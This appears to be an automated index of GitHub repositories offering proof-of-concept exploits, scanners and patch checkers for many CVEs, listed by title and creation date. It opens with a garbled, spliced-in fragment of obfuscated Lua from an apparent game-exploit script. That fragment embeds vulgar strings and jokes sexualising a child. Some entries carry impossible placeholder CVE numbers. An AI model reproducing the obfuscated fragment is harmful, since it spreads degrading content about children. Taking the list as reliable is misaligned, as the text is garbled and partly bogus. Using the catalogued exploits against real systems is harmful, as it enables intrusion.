update"))));[((701905154-#("The Person who reads this is gay")))]=((1));[(824210494)]=(((139-#("I'm not ignoring you, my DMs are full. Can't DM me? Shoot me a email: [email protected] (Business enquiries only)"))));[((#{203;}+370022248))]=((16777216));[((430646917-#("unluac.exe in.txt > out.txt winning")))]=(((898302895-#("psu premium chads winning (only joe biden supporters use the free version)"))));[((#{}+47990351))]=(((191-#("when the constants are sus"))));[(605464520)]=((233));c2kzP=(((#{784;950;953;}+956102)));[(327209039)]=("\111");[(997482266)]=("\97");['OrQjp']=(((838-#("Luraph v12.6 has been released!: changed absolutely fucking nothing but donate to my patreon!"))));[(979538621)]=("\103");[((533198931-#("woooow u hooked an opcode, congratulations~ now suck my cock")))]=(((57-#("Cling clang, hide the kids, someones outta find you.."))));Scn8D=(((#{}+565203252)));['go8gB5']=(((#{591;724;(function(...)return 310,199;end)()}+48)));[(492894777)]=((20));["iDrHJlw"]=(((#{829;411;803;(function(...)return 5,791,89;end)()}+340)));[(494037456)]=(((277-#("Perth Was here impossible ikr"))));[(923177392)]=("\115");[(827339274)]=(((293836-#("@everyone designs are done. luraph website coming.... eta JULY 2020"))));[(863208763)]=((752));JiZrY3CeQQ=(((#{237;502;(function(...)return 639,908,654,...;end)(984,952,663)}+1015)));[((#{507;351;(function(...)return 759,662;end)()}+96949728))]=(((#{42;119;25;(function(...)return 394,260,477;end)()}+26528)));[((922805348-#("unluac.exe in.txt > out.txt winning")))]=("\104");[((#{537;251;309;}+70077821))]=(((#{772;167;982;845;(function(...)return 319,766,300,186;end)()}+762824387)));[(565203252)]=("\109");[((263166901-#("Bunu yazan tosun... - federal")))]=((834822766));[((15938870-#("[CW] icepools likes kids")))]=((1336));[((#{184;733;31;}+159216642))]=(((#{}+256)));[(958457340)]=(((#{(function(...)return 417,228;end)()}+7943)));['uUXvBWo']=((95848));[((#{486;}+190852216))]=((33602));uEpL0=((9));[(75464704)]=((202074714));[((#{749;288;17;}+846113342))]=(((#{766;970;}+65534)));[((#{623;}+663362031))]=(((#{95;842;755;(function(...)return 908,660,128,210;end)()}+83)));[((#{}+194348571))]=("\51");COtNSuo1d=(((255648-#("Cling clang, hide the kids, someones outta find you.."))));[(956899809)]=((341));[((57492442-#("I'm not ignoring you, my DMs are full. Can't DM me? Shoot me a email: [email protected] (Business enquiries only)")))]=(((780692646-#("PSU|161027525v21222B11273172751L275102731327523d27f22I27f21o26o24Y21J1827F1X27f1r27F23823a26w1... oh wait"))));[((416931187-#("who the fuck looked at synapse xen and said 'yeah this is good enough for release'")))]=((255));[((28934726-#("PSU|161027525v21222B11273172751L275102731327523d27f22I27f21o26o24Y21J1827F1X27f1r27F23823a26w1... oh wait")))]=((31));[(567957394)]=(((922805387-#("psu premium chads winning (only joe biden supporters use the free version)"))));[((#{216;356;(function(...)return 843,629;end)()}+876638578))]=((927128303));UE90U=("\100");[(865753153)]=(((918350490-#("who the fuck looked at synapse xen and said 'yeah this is good enough for release'"))));[(762368821)]=(((#{652;272;644;829;(function(...)return 997,412;end)()}+979538615)));[((202074729-#("concat was here")))]=("\41");i6WXc=("\121");[(869746937)]=((793));[((481358673-#("constant_table = {}")))]=((5000));[((#{66;275;642;}+672247143))]=(((36-#("When the exploiter is sus"))));[((#{332;(function(...)return 973;end)()}+409837452))]=((21));[(811587745)]=(((371-#("Luraph v12.6 has been released!: changed absolutely fucking nothing but donate to my patreon!"))));[(79830066)]=("\98");[((#{}+387676409))]=("\112");[(480269586)]=(((1569-#("Are you using AztupBrew, clvbrew, or IB2? Congratulations! You're deobfuscated!"))));[((#{694;381;477;}+918350405))]=("\116");[((#{848;}+780692540))]=("\114");[((#{}+182086789))]=((225));[((492761477-#("psu == femboy hangout")))]=((668));[(341291526)]=((715479886));[(463178462)]=((704491465));[((856255394-#("Hey reader, you're a sussy baka")))]=(((7481-#("constant_table = {}"))));["r1cqs9N"]=((6));[((29671414-#("this isn't krnl support you bonehead moron")))]=(((56-#("0x59 likes fat cock."))));oMeYI6Vsq=("\50");["SQpm8iR"]=(((#{129;683;103;}+130)));[((#{388;}+221971849))]=(((#{569;109;}+6)));deh8lN=((186));[((#{65;513;288;894;(function(...)return;end)()}+293569683))]=((194348571));[((77144460-#("balls and cum")))]=("\120");[((#{510;114;325;}+834822763))]=("\102");[(939710752)]=(((#{}+79830066)));[(825726076)]=((376));[((#{(function(...)return...;end)(0)}+321374524))]=((272));jHcykE9w=("\110");[(781635957)]=((646));fjSyrj8tWn=(((#{123;767;889;469;}+387676405)));[(453592822)]=((327209039));[(927128303)]=("\40");[(150106732)]=(((#{(function(...)return 56,93,810;end)()}+77144444)));[((#{142;120;97;168;(function(...)return 143;end)()}+895492234))]=((2546));[((26869071-#("When the exploiter is sus")))]=(((#{125;905;273;413;}+26911)));["Yt1hfpp8"]=("\43");[(146286062)]=("\99");[((389322660-#("anofrillsguidetolua51instructions.pdf")))]=(((1038-#("Cling clang, hide the kids, someones outta find you.."))));[((#{658;634;38;(function(...)return...;end)(908,218,616)}+334076815))]=((2047));[((#{}+762824395))]=("\101");["PqLYvf"]=((3));[((405894024-#("psu premium chads winning (only joe biden supporters use the free version)")))]=(((#{113;296;547;546;(function(...)return 604,683,...;end)(808,365)}-1)));[(254220684)]=((923177392));[((97417786-#("IIiIIiillIiiIIIiiii :troll:")))]=("\35");['I0CLL2O']=(((#{196;868;735;}-1)));["U2G9b2ao"]=(((26-#("when the constants are sus"))));["zVFL6R"]=("\117");['AQkXdpp']=(((#{140;387;71;162;(function(...)return 722,278,...;end)(701,812)}+110248082)));[(233258420)]=(((43641-#("constant_table = {}"))));[(457264530)]=((146286062));J0JbS=((682));[((#{924;510;438;}+626377435))]=(((283-#("oh Mr. Pools, thats a little close please dont touch me there... please Mr. Pools I am only eight years old please stop..."))));}),...)})do return e end;** : [Gothsmane/Anti-kick](https://github.com/Gothsmane/Anti-kick) create time: 2021-08-17T11:17:18Z

**PTLabs** : [R3dAlch3mist/cve-2018-6574](https://github.com/R3dAlch3mist/cve-2018-6574) create time: 2021-08-17T09:09:48Z

**CVE-2019-11932** : [Tabni/https-github.com-awakened1712-CVE-2019-11932](https://github.com/Tabni/https-github.com-awakened1712-CVE-2019-11932) create time: 2021-08-17T08:35:11Z

**no description** : [security-n/CVE-2021-38710](https://github.com/security-n/CVE-2021-38710) create time: 2021-08-16T04:22:29Z

**no description** : [l3ouu4n9/CVE-2018-6574-POC](https://github.com/l3ouu4n9/CVE-2018-6574-POC) create time: 2021-08-16T15:06:58Z

**CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability** : [phamphuqui1998/CVE-2021-34473](https://github.com/phamphuqui1998/CVE-2021-34473) create time: 2021-08-16T11:27:13Z

**Sudo Heap Overflow Baron Samedit** : [0x7183/CVE-2021-3156](https://github.com/0x7183/CVE-2021-3156) create time: 2021-08-13T14:23:09Z

**CVE-2021-25790-Multiple-Stored-XSS : Multiple Stored XSS in House Rental and Property Listing** : [MrCraniums/CVE-2021-25790-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25790-Multiple-Stored-XSS) create time: 2021-08-16T11:46:02Z

**Multiple Stored XSS Online Doctor Appointment System** : [MrCraniums/CVE-2021-25791-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25791-Multiple-Stored-XSS) create time: 2021-08-16T11:25:30Z

**A tool to crash MySQL servers with CVE-2017-3599** : [jptr218/mysql_dos](https://github.com/jptr218/mysql_dos) create time: 2021-08-16T10:39:44Z

**CVE-2021-3707 , CVE-2021-3708** : [HadiMed/firmware-analysis](https://github.com/HadiMed/firmware-analysis) create time: 2021-05-29T12:24:04Z

**CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability** : [whichbuffer/CVE-2021-34473](https://github.com/whichbuffer/CVE-2021-34473) create time: 2021-08-16T08:14:33Z

**Sudo heap-based buffer overflow privilege escalation commands and mitigations.** : [Kleptocratic/CVE-2021-3156](https://github.com/Kleptocratic/CVE-2021-3156) create time: 2021-08-16T01:10:34Z

**Stored XSS in TastyIgniter v3.0.7 Restaurtant CMS** : [HuskyHacks/CVE-2021-38699-Stored-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Stored-XSS) create time: 2021-08-12T22:32:18Z

**Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurtant CMS** : [HuskyHacks/CVE-2021-38699-Reflected-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Reflected-XSS) create time: 2021-08-12T21:12:04Z

**The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL/TLS to keep the connection alive.** : [pierceoneill/bleeding-heart](https://github.com/pierceoneill/bleeding-heart) create time: 2021-08-15T11:05:23Z

**tools for automate configure Ubuntu 20.04 enviroment for testing CVE-2021-28476.** : [sh4m2hwz/CVE-2021-28476-tools-env](https://github.com/sh4m2hwz/CVE-2021-28476-tools-env) create time: 2021-08-15T11:10:40Z

**check if Azure AD Connect is affected by the vulnerability described in CVE-2021-36949** : [Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability](https://github.com/Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability) create time: 2021-08-14T21:05:30Z

**TastyIgniter 3.0.7 allows XSS via the name field during user-account creation** : [Justin-1993/CVE-2021-38699](https://github.com/Justin-1993/CVE-2021-38699) create time: 2021-08-14T20:57:00Z

**An implementation of CVE-2020-1938** : [jptr218/ghostcat](https://github.com/jptr218/ghostcat) create time: 2021-08-14T17:32:51Z

**WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5** : [dnr6419/CVE-2021-24145](https://github.com/dnr6419/CVE-2021-24145) create time: 2021-08-14T02:56:50Z

**Rewrittened CVE-2019-0708 poc and exp** : [c4dr01d/CVE-2019-0708](https://github.com/c4dr01d/CVE-2019-0708) create time: 2021-08-14T01:56:54Z

**Rewrittened CVE-2021-31166 poc and exp** : [c4dr01d/CVE-2021-31166](https://github.com/c4dr01d/CVE-2021-31166) create time: 2021-08-14T01:56:12Z

**Ampache XSS** : [dnr6419/CVE-2021-32644](https://github.com/dnr6419/CVE-2021-32644) create time: 2021-08-14T01:50:32Z

**no description** : [charlesbickel/CVE-2021-38619](https://github.com/charlesbickel/CVE-2021-38619) create time: 2021-08-13T02:42:25Z

**WpDiscuz 7.0.4 Arbitrary File Upload Exploit** : [meicookies/CVE-2020-24186](https://github.com/meicookies/CVE-2020-24186) create time: 2021-08-13T11:32:47Z

**WpDiscuz 7.0.4 Arbitrary File Upload Exploit** : [meicookies/CVE-2020-24186](https://github.com/meicookies/CVE-2020-24186) create time: 2021-08-13T10:58:20Z

**no description** : [y-f00l/CVE-2020-14364](https://github.com/y-f00l/CVE-2020-14364) create time: 2021-08-13T07:44:50Z

**cve-2021-12312** : [FirDragon/cve-2021-12312](https://github.com/FirDragon/cve-2021-12312) create time: 2021-08-13T05:02:38Z

**cve-2021-123123123** : [FirDragon/cve-2021-123123123](https://github.com/FirDragon/cve-2021-123123123) create time: 2021-08-13T04:52:24Z

**CVE-2021-123123** : [FirDragon/CVE-2021-123123](https://github.com/FirDragon/CVE-2021-123123) create time: 2021-08-13T04:48:46Z

**no description** : [KielVaughn/CVE-2021-38603](https://github.com/KielVaughn/CVE-2021-38603) create time: 2021-08-12T21:08:54Z

**no description** : [KielVaughn/CVE-2021-38602](https://github.com/KielVaughn/CVE-2021-38602) create time: 2021-08-12T03:55:27Z

**CVE-2021-38601 - Reflected XSS in Pepperminty-Wiki 0.23-dev** : [hmaverickadams/CVE-2021-38601](https://github.com/hmaverickadams/CVE-2021-38601) create time: 2021-08-12T18:55:02Z

**CVE-2021-38600 - Stored XSS in Pepperminty-Wiki 0.23-dev** : [hmaverickadams/CVE-2021-38600](https://github.com/hmaverickadams/CVE-2021-38600) create time: 2021-08-12T18:44:05Z

**Exploit for CVE-2021-36934** : [chron1k/oxide_hive](https://github.com/chron1k/oxide_hive) create time: 2021-08-12T18:01:21Z

**Exploit for CVE-2021-36934** : [chron1k/oxide_hive](https://github.com/chron1k/oxide_hive) create time: 2021-08-12T17:19:59Z

**Exploit for CVE-2020-8277 (educational purpose)** : [progfay/CVE-2020-8277](https://github.com/progfay/CVE-2020-8277) create time: 2021-08-12T06:14:15Z

**cve** : [e0mlja/cve202014883](https://github.com/e0mlja/cve202014883) create time: 2021-08-12T03:09:43Z

**no description** : [charlesbickel/CVE-2021-38583](https://github.com/charlesbickel/CVE-2021-38583) create time: 2021-08-11T20:19:39Z

**Zeek Package to detect cve-2017-2741** : [dopheide-esnet/zeek-jetdirect](https://github.com/dopheide-esnet/zeek-jetdirect) create time: 2021-08-11T20:39:05Z

**Check patch for CVE-2021-34481** : [vanpn/CVE-2021-34481](https://github.com/vanpn/CVE-2021-34481) create time: 2021-08-11T16:56:10Z

**no description** : [puckiestyle/CVE-2019-15107](https://github.com/puckiestyle/CVE-2019-15107) create time: 2021-08-11T12:39:45Z

**no description** : [ajeanne33/CVE-2021-34473-scanner](https://github.com/ajeanne33/CVE-2021-34473-scanner) create time: 2021-08-11T12:20:07Z

**no description** : [puckiestyle/CVE-2020-35606](https://github.com/puckiestyle/CVE-2020-35606) create time: 2021-08-11T10:54:22Z

**no description** : [Jerry-zhuang/CVE-2017-1000117](https://github.com/Jerry-zhuang/CVE-2017-1000117) create time: 2021-08-11T07:09:26Z

**no description** : [OlivierLaflamme/CVE-2021-36934_export_shadow_volume](https://github.com/OlivierLaflamme/CVE-2021-36934_export_shadow_volume) create time: 2021-08-10T19:39:28Z

**nuclei scanner for proxyshell ( CVE-2021-34473 )** : [cyberheartmi9/Proxyshell-Scanner](https://github.com/cyberheartmi9/Proxyshell-Scanner) create time: 2021-08-10T15:01:02Z

**CVE-2019-11043** : [jptr218/php_hack](https://github.com/jptr218/php_hack) create time: 2021-08-10T14:06:27Z

**[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)** : [murataydemir/CVE-2021-27905](https://github.com/murataydemir/CVE-2021-27905) create time: 2021-08-10T07:49:47Z

**Windows Font Driver Type 1 VToHOrigin stack corruption** : [KaLendsi/CVE-2020-1020](https://github.com/KaLendsi/CVE-2020-1020) create time: 2021-08-10T03:10:39Z

**no description** : [yinfeidi/CVE-2021-31655](https://github.com/yinfeidi/CVE-2021-31655) create time: 2021-08-10T02:32:00Z

**CVE-2021-2109 basic scanner** : [dinosn/CVE-2021-2109](https://github.com/dinosn/CVE-2021-2109) create time: 2021-08-09T11:02:45Z

**no description** : [BabyTeam1024/CVE-2021-2394](https://github.com/BabyTeam1024/CVE-2021-2394) create time: 2021-08-08T16:12:17Z

**pentesterlab challange** : [prizoner627/CVE2018](https://github.com/prizoner627/CVE2018) create time: 2021-08-08T13:26:50Z

**no description** : [julio-cfa/POC-ES-File-Explorer-CVE-2019-6447](https://github.com/julio-cfa/POC-ES-File-Explorer-CVE-2019-6447) create time: 2021-08-08T02:54:25Z

**PoC for exploiting CVE-2020-27153 : In BlueZ before 5.55, a double free was found in the gatttool disconnect_cb() routine from shared/att.c. A remote attacker could potentially cause a denial of service or code execution, during service discovery, due to a redundant disconnect MGMT event.** : [AlAIAL90/CVE-2020-27153](https://github.com/AlAIAL90/CVE-2020-27153) create time: 2021-08-08T01:08:51Z

**PoC for exploiting CVE-2020-26558 : Bluetooth LE and BR/EDR secure pairing in Bluetooth Core Specification 2.1 through 5.2 may permit a nearby man-in-the-middle attacker to identify the Passkey used during pairing (in the Passkey authentication procedure) by reflection of the public key and the authentication evidence of the initiating device, potentially permitting this attacker to complete authenticated pairing with the responding device using the correct Passkey for the pairing session. The attack methodology determines the Passkey value one bit at a time.** : [AlAIAL90/CVE-2020-26558](https://github.com/AlAIAL90/CVE-2020-26558) create time: 2021-08-08T01:08:45Z

**PoC for exploiting CVE-2021-0129 : Improper access control in BlueZ may allow an authenticated user to potentially enable information disclosure via adjacent access.** : [AlAIAL90/CVE-2021-0129](https://github.com/AlAIAL90/CVE-2021-0129) create time: 2021-08-08T01:08:40Z

**ACE poc exploit for glibc cpio 2.13 through mmap chunk metadata curruption (CVE-2021-38185)** : [fangqyi/cpiopwn](https://github.com/fangqyi/cpiopwn) create time: 2021-07-19T20:10:13Z

**PoC for exploiting CVE-2019-10156 : A flaw was discovered in the way Ansible templating was implemented in versions before 2.6.18, 2.7.12 and 2.8.2, causing the possibility of information disclosure through unexpected variable substitution. By taking advantage of unintended variable substitution the content of any variable may be disclosed.** : [AlAIAL90/CVE-2019-10156](https://github.com/AlAIAL90/CVE-2019-10156) create time: 2021-08-07T20:07:06Z

**PoC for exploiting CVE-2019-10206 : ansible-playbook -k and ansible cli tools, all versions 2.8.x before 2.8.4, all 2.7.x before 2.7.13 and all 2.6.x before 2.6.19, prompt passwords by expanding them from templates as they could contain special characters. Passwords should be wrapped to prevent templates trigger and exposing them.** : [AlAIAL90/CVE-2019-10206](https://github.com/AlAIAL90/CVE-2019-10206) create time: 2021-08-07T20:07:01Z

**PoC for exploiting CVE-2019-14904 : A flaw was found in the solaris_zone module from the Ansible Community modules. When setting the name for the zone on the Solaris host, the zone name is checked by listing the process with the 'ps' bare command on the remote machine. An attacker could take advantage of this flaw by crafting the name of the zone and executing arbitrary commands in the remote host. Ansible Engine 2.7.15, 2.8.7, and 2.9.2 as well as previous versions are affected.** : [AlAIAL90/CVE-2019-14904](https://github.com/AlAIAL90/CVE-2019-14904) create time: 2021-08-07T20:06:49Z

**PoC for exploiting CVE-2019-14864 : Ansible, versions 2.9.x before 2.9.1, 2.8.x before 2.8.7 and Ansible versions 2.7.x before 2.7.15, is not respecting the flag no_log set it to True when Sumologic and Splunk callback plugins are used send tasks results events to collectors. This would discloses and collects any sensitive data.** : [AlAIAL90/CVE-2019-14864](https://github.com/AlAIAL90/CVE-2019-14864) create time: 2021-08-07T20:06:33Z

**PoC for exploiting CVE-2019-14846 : In Ansible, all Ansible Engine versions up to ansible-engine 2.8.5, ansible-engine 2.7.13, ansible-engine 2.6.19, were logging at the DEBUG level which lead to a disclosure of credentials if a plugin used a library that logged credentials at the DEBUG level. This flaw does not affect Ansible modules, as those are executed in a separate process.** : [AlAIAL90/CVE-2019-14846](https://github.com/AlAIAL90/CVE-2019-14846) create time: 2021-08-07T20:06:10Z

**PoC for exploiting CVE-2020-14365 : A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when disable_gpg_check is set to False, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability.** : [AlAIAL90/CVE-2020-14365](https://github.com/AlAIAL90/CVE-2020-14365) create time: 2021-08-07T20:07:14Z

**PoC for exploiting CVE-2020-10684 : A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.** : [AlAIAL90/CVE-2020-10684](https://github.com/AlAIAL90/CVE-2020-10684) create time: 2021-08-07T20:07:10Z

**PoC for exploiting CVE-2020-10685 : A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble.** : [AlAIAL90/CVE-2020-10685](https://github.com/AlAIAL90/CVE-2020-10685) create time: 2021-08-07T20:06:57Z

**PoC for exploiting CVE-2020-1746 : A flaw was found in the Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when the ldap_attr and ldap_entry community modules are used. The issue discloses the LDAP bind password to stdout or a log file if a playbook task is written using the bind_pw in the parameters field. The highest threat from this vulnerability is data confidentiality.** : [AlAIAL90/CVE-2020-1746](https://github.com/AlAIAL90/CVE-2020-1746) create time: 2021-08-07T20:06:53Z

**PoC for exploiting CVE-2020-1735 : A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.** : [AlAIAL90/CVE-2020-1735](https://github.com/AlAIAL90/CVE-2020-1735) create time: 2021-08-07T20:06:45Z

**PoC for exploiting CVE-2020-1739 : A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument "password" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.** : [AlAIAL90/CVE-2020-1739](https://github.com/AlAIAL90/CVE-2020-1739) create time: 2021-08-07T20:06:41Z

**PoC for exploiting CVE-2020-14332 : A flaw was found in the Ansible Engine when using module_args. Tasks executed with check mode (--check-mode) do not properly neutralize sensitive data exposed in the event data. This flaw allows unauthorized users to read this data. The highest threat from this vulnerability is to confidentiality.** : [AlAIAL90/CVE-2020-14332](https://github.com/AlAIAL90/CVE-2020-14332) create time: 2021-08-07T20:06:37Z

**PoC for exploiting CVE-2020-1733 : A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with an unprivileged become user. When Ansible needs to run a module with become user, the temporary directory is created in /var/tmp. This directory is created with "umask 77 && mkdir -p <dir>"; this operation does not fail if the directory already exists and is owned by another user. An attacker could take advantage to gain control of the become user as the target directory can be retrieved by iterating '/proc/<pid>/cmdline'.** : [AlAIAL90/CVE-2020-1733](https://github.com/AlAIAL90/CVE-2020-1733) create time: 2021-08-07T20:06:29Z

**PoC for exploiting CVE-2020-1740 : A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes "ansible-vault edit", another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the file before recreating it insecurely. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.** : [AlAIAL90/CVE-2020-1740](https://github.com/AlAIAL90/CVE-2020-1740) create time: 2021-08-07T20:06:24Z

**PoC for exploiting CVE-2020-1753 : A security flaw was found in Ansible Engine, all Ansible 2.7.x versions prior to 2.7.17, all Ansible 2.8.x versions prior to 2.8.11 and all Ansible 2.9.x versions prior to 2.9.7, when managing kubernetes using the k8s module. Sensitive parameters such as passwords and tokens are passed to kubectl from the command line, not using an environment variable or an input configuration file. This will disclose passwords and tokens from process list and no_log directive from debug module would not have any effect making these secrets being disclosed on stdout and log files.** : [AlAIAL90/CVE-2020-1753](https://github.com/AlAIAL90/CVE-2020-1753) create time: 2021-08-07T20:06:18Z

**PoC for exploiting CVE-2020-14330 : An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest threat from this vulnerability is to data confidentiality.** : [AlAIAL90/CVE-2020-14330](https://github.com/AlAIAL90/CVE-2020-14330) create time: 2021-08-07T20:06:14Z

**PoC for exploiting CVE-2020-10729 : A flaw was found in the use of insufficiently random values in Ansible. Two random password lookups of the same length generate the equal value as the template caching action for the same file since no re-evaluation happens. The highest threat from this vulnerability would be that all passwords are exposed at once for the file. This flaw affects Ansible Engine versions before 2.9.6.** : [AlAIAL90/CVE-2020-10729](https://github.com/AlAIAL90/CVE-2020-10729) create time: 2021-08-07T20:06:01Z

**PoC for exploiting CVE-2021-20228 : A flaw was found in the Ansible Engine 2.9.18, where sensitive info is not masked by default and is not protected by the no_log feature when using the sub-option feature of the basic.py module. This flaw allows an attacker to obtain sensitive information. The highest threat from this vulnerability is to confidentiality.** : [AlAIAL90/CVE-2021-20228](https://github.com/AlAIAL90/CVE-2021-20228) create time: 2021-08-07T20:06:05Z

**CVE-20210-485** : [Ch0pin/CVE20210485](https://github.com/Ch0pin/CVE20210485) create time: 2021-08-07T18:03:30Z

**PoC for exploiting CVE-2020-3391 : A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to view sensitive information in clear text. The vulnerability is due to insecure storage of certain unencrypted credentials on an affected device. An attacker could exploit this vulnerability by viewing the network device configuration and obtaining credentials that they may not normally have access to. A successful exploit could allow the attacker to use those credentials to discover and manage network devices.** : [AlAIAL90/CVE-2020-3391](https://github.com/AlAIAL90/CVE-2020-3391) create time: 2021-08-07T15:35:54Z

**PoC for exploiting CVE-2020-3387 : A vulnerability in Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to execute code with root privileges on an affected system. The vulnerability is due to insufficient input sanitization during user authentication processing. An attacker could exploit this vulnerability by sending a crafted response to the Cisco SD-WAN vManage Software. A successful exploit could allow the attacker to access the software and execute commands they should not be authorized to execute.** : [AlAIAL90/CVE-2020-3387](https://github.com/AlAIAL90/CVE-2020-3387) create time: 2021-08-07T15:35:49Z

**PoC for exploiting CVE-2020-3398 : A vulnerability in the Border Gateway Protocol (BGP) Multicast VPN (MVPN) implementation of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a BGP session to repeatedly reset, causing a partial denial of service (DoS) condition due to the BGP session being down. The vulnerability is due to incorrect parsing of a specific type of BGP MVPN update message. An attacker could exploit this vulnerability by sending this BGP MVPN update message to a targeted device. A successful exploit could allow the attacker to cause the BGP peer connections to reset, which could lead to BGP route instability and impact traffic. The incoming BGP MVPN update message is valid but is parsed incorrectly by the NX-OS device, which could send a corrupted BGP update to the configured BGP peer. Note: The Cisco implementation of BGP accepts incoming BGP traffic from only explicitly configured peers. To exploit this vulnerability, an attacker must send a specific BGP MVPN update message over an established TCP connection that appears to come from a trusted BGP peer. To do so, the attacker must obtain information about the BGP peers in the trusted network of the affected system.** : [AlAIAL90/CVE-2020-3398](https://github.com/AlAIAL90/CVE-2020-3398) create time: 2021-08-07T15:35:45Z

**PoC for exploiting CVE-2020-3379 : A vulnerability in Cisco SD-WAN Solution Software could allow an authenticated, local attacker to elevate privileges to Administrator on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted request to an affected system. A successful exploit could allow the attacker to gain administrative privileges.** : [AlAIAL90/CVE-2020-3379](https://github.com/AlAIAL90/CVE-2020-3379) create time: 2021-08-07T15:35:41Z

**PoC for exploiting CVE-2020-3383 : A vulnerability in the archive utility of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. The vulnerability is due to a lack of proper input validation of paths that are embedded within archive files. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to write arbitrary files in the system with the privileges of the logged-in user.** : [AlAIAL90/CVE-2020-3383](https://github.com/AlAIAL90/CVE-2020-3383) create time: 2021-08-07T15:35:37Z

**PoC for exploiting CVE-2020-3444 : A vulnerability in the packet filtering features of Cisco SD-WAN Software could allow an unauthenticated, remote attacker to bypass L3 and L4 traffic filters. The vulnerability is due to improper traffic filtering conditions on an affected device. An attacker could exploit this vulnerability by crafting a malicious TCP packet with specific characteristics and sending it to a targeted device. A successful exploit could allow the attacker to bypass the L3 and L4 traffic filters and inject an arbitrary packet into the network.** : [AlAIAL90/CVE-2020-3444](https://github.com/AlAIAL90/CVE-2020-3444) create time: 2021-08-07T15:35:33Z

**PoC for exploiting CVE-2020-3441 : A vulnerability in Cisco Webex Meetings and Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to view sensitive information from the meeting room lobby. This vulnerability is due to insufficient protection of sensitive participant information. An attacker could exploit this vulnerability by browsing the Webex roster. A successful exploit could allow the attacker to gather information about other Webex participants, such as email address and IP address, while waiting in the lobby.** : [AlAIAL90/CVE-2020-3441](https://github.com/AlAIAL90/CVE-2020-3441) create time: 2021-08-07T15:35:29Z

**PoC for exploiting CVE-2020-3451 : Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV340 Series Routers could allow an authenticated, remote attacker with administrative credentials to execute arbitrary commands on the underlying operating system (OS) as a restricted user. For more information about these vulnerabilities, see the Details section of this advisory.** : [AlAIAL90/CVE-2020-3451](https://github.com/AlAIAL90/CVE-2020-3451) create time: 2021-08-07T15:35:24Z

**PoC for exploiting CVE-2020-3452 : A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.** : [AlAIAL90/CVE-2020-3452](https://github.com/AlAIAL90/CVE-2020-3452) create time: 2021-08-07T15:35:20Z

